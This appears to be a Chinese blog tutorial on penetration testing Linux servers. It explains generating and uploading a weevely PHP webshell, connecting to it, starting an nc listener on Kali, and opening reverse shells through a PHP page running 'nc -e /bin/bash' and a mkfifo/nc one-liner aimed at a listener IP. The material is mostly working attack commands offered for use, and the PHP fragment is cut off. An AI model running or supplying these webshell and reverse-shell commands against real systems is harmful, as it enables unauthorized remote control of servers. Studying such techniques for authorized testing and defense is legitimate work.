webshell与反弹shell使用详解

1 介绍

在对linux服务器渗透测试的过程中,我们在getshell得到一个低权限的webshell,由于webshell是非交互式shell,通常要反弹一个交互式的shell,然后提权(不然提权后,还是原来的权限)

2 webshell 获取

2.1 php策略

PHP环境下反弹shell,过去我们通常用phpspy等shell自带反弹即可,这里将其反弹部分代码提取出来,访问即可反弹到指定IP端口一个普通交互shell。
(1)下面利用weevely生成一个php

weevely generate 123456  ./webshell.php

命令格式:weevely generate 密码 路径文件名
下面我们将生成的webshell.php, 通过各种方法上传到目标服务器,然后找出其访问地址。
(2)找出地址后,通过命令连接

weevely http://192.168.56.7/templates/beez3/webshell.php 123456
shell

然后就成功了

3 kali监听

  1. 开启nc监听(这里是6666端口)

    nc -lvp 6666 
    

    在这里插入图片描述
    在获取到webshell后,在里面运行以下命令

4 反弹 shell

用到的IP地址为kali自己的

4.1 php 反弹shell页面

上传到服务器,test.php,找到地址,访问此页面即可

('nc -e /bin/bash 192.168.246.138 6666')?>

4.2 rm

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.3 6666 >/tmp/f

还有更多方法在下面两个博客,有靶机了在测试更新

参考:
https://blog.csdn.net/redwand/article/details/105791548
https://blog.csdn.net/nzjdsds/article/details/82929265

你可能感兴趣的:(网络安全,kali,linux,渗透测试,shell)